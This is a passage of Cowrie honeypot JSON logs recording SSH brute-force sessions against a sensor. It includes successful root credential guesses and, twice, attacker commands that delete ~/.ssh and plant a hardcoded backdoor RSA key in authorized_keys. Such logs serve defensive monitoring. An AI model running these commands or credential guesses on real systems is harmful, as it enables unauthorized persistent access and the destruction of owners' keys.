03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:04:23.289525Z","src_ip":"103.59.95.12","session":"c979f51b59a2"}
{"eventid":"cowrie.login.success","username":"root","password":"qaz@12345","message":"login attempt [root/qaz@12345] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:04:24.386193Z","src_ip":"103.59.95.12","session":"c979f51b59a2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:04:25.591814Z","src_ip":"103.59.95.12","session":"c979f51b59a2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:04:25.592508Z","src_ip":"103.59.95.12","session":"c979f51b59a2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:04:25.593421Z","src_ip":"103.59.95.12","session":"c979f51b59a2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:04:25.871431Z","src_ip":"103.59.95.12","session":"c979f51b59a2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:04:26.429965Z","src_ip":"103.59.95.12","session":"c979f51b59a2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:04:26.430674Z","src_ip":"103.59.95.12","session":"c979f51b59a2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:04:26.702905Z","src_ip":"103.59.95.12","session":"c979f51b59a2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:04:26.703854Z","src_ip":"103.59.95.12","session":"c979f51b59a2"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":33332,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d7ae5e9b258","protocol":"ssh","message":"New connection: 103.59.95.12:33332 (1.2.3.4:22) [session: 7d7ae5e9b258]","sensor":"my-vps","timestamp":"2025-09-09T04:04:26.974592Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:04:26.975364Z","src_ip":"103.59.95.12","session":"7d7ae5e9b258"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:04:27.248399Z","src_ip":"103.59.95.12","session":"7d7ae5e9b258"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:04:28.831115Z","src_ip":"103.59.95.12","session":"7d7ae5e9b258"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:04:30.108812Z","src_ip":"103.59.95.12","session":"7d7ae5e9b258"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":33338,"dst_ip":"1.2.3.4","dst_port":22,"session":"0bceeba1d61e","protocol":"ssh","message":"New connection: 103.59.95.12:33338 (1.2.3.4:22) [session: 0bceeba1d61e]","sensor":"my-vps","timestamp":"2025-09-09T04:04:30.379138Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:04:30.384698Z","src_ip":"103.59.95.12","session":"0bceeba1d61e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:04:30.655232Z","src_ip":"103.59.95.12","session":"0bceeba1d61e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:04:31.737738Z","src_ip":"103.59.95.12","session":"0bceeba1d61e"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:04:32.009717Z","src_ip":"103.59.95.12","session":"0bceeba1d61e"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:04:32.010719Z","src_ip":"103.59.95.12","session":"c979f51b59a2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52804,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7e4f1f9b042","protocol":"ssh","message":"New connection: 212.227.235.229:52804 (1.2.3.4:22) [session: f7e4f1f9b042]","sensor":"my-vps","timestamp":"2025-09-09T04:04:40.335835Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:04:40.336937Z","src_ip":"212.227.235.229","session":"f7e4f1f9b042"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53206,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c916d7b4bd2","protocol":"ssh","message":"New connection: 212.227.235.229:53206 (1.2.3.4:22) [session: 2c916d7b4bd2]","sensor":"my-vps","timestamp":"2025-09-09T04:04:40.451650Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T04:04:40.452340Z","src_ip":"212.227.235.229","session":"2c916d7b4bd2"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-09T04:04:40.588950Z","src_ip":"212.227.235.229","session":"2c916d7b4bd2"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:04:40.999791Z","src_ip":"212.227.235.229","session":"2c916d7b4bd2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-09T04:04:41.138749Z","session":"2c916d7b4bd2"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":56664,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c7c4427ddb1","protocol":"ssh","message":"New connection: 154.209.4.55:56664 (1.2.3.4:22) [session: 3c7c4427ddb1]","sensor":"my-vps","timestamp":"2025-09-09T04:04:52.744404Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:04:52.745625Z","src_ip":"154.209.4.55","session":"3c7c4427ddb1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:04:52.948204Z","src_ip":"154.209.4.55","session":"3c7c4427ddb1"}
{"eventid":"cowrie.login.success","username":"root","password":"Alpha123","message":"login attempt [root/Alpha123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:04:53.754409Z","src_ip":"154.209.4.55","session":"3c7c4427ddb1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:04:54.228603Z","src_ip":"154.209.4.55","session":"3c7c4427ddb1"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:04:54.229345Z","src_ip":"154.209.4.55","session":"3c7c4427ddb1"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:04:54.230447Z","src_ip":"154.209.4.55","session":"3c7c4427ddb1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:04:54.436036Z","src_ip":"154.209.4.55","session":"3c7c4427ddb1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:04:54.864957Z","src_ip":"154.209.4.55","session":"3c7c4427ddb1"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:04:54.865814Z","src_ip":"154.209.4.55","session":"3c7c4427ddb1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:04:55.073494Z","src_ip":"154.209.4.55","session":"3c7c4427ddb1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:04:55.074621Z","src_ip":"154.209.4.55","session":"3c7c4427ddb1"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":57207,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e60966ccb61","protocol":"ssh","message":"New connection: 154.209.4.55:57207 (1.2.3.4:22) [session: 6e60966ccb61]","sensor":"my-vps","timestamp":"2025-09-09T04:04:55.271295Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:04:55.277517Z","src_ip":"154.209.4.55","session":"6e60966ccb61"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:04:55.475673Z","src_ip":"154.209.4.55","session":"6e60966ccb61"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:04:56.288575Z","src_ip":"154.209.4.55","session":"6e60966ccb61"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:04:57.490560Z","src_ip":"154.209.4.55","session":"6e60966ccb61"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":57643,"dst_ip":"1.2.3.4","dst_port":22,"session":"da18bfa5e6f3","protocol":"ssh","message":"New connection: 154.209.4.55:57643 (1.2.3.4:22) [session: da18bfa5e6f3]","sensor":"my-vps","timestamp":"2025-09-09T04:04:57.692018Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:04:57.711681Z","src_ip":"154.209.4.55","session":"da18bfa5e6f3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:04:57.912220Z","src_ip":"154.209.4.55","session":"da18bfa5e6f3"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:04:58.727501Z","src_ip":"154.209.4.55","session":"da18bfa5e6f3"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:04:58.930167Z","src_ip":"154.209.4.55","session":"3c7c4427ddb1"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:04:58.931521Z","src_ip":"154.209.4.55","session":"da18bfa5e6f3"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":47352,"dst_ip":"1.2.3.4","dst_port":22,"session":"d62b53367580","protocol":"ssh","message":"New connection: 192.210.135.20:47352 (1.2.3.4:22) [session: d62b53367580]","sensor":"my-vps","timestamp":"2025-09-09T04:05:00.225103Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:05:00.225873Z","src_ip":"192.210.135.20","session":"d62b53367580"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","h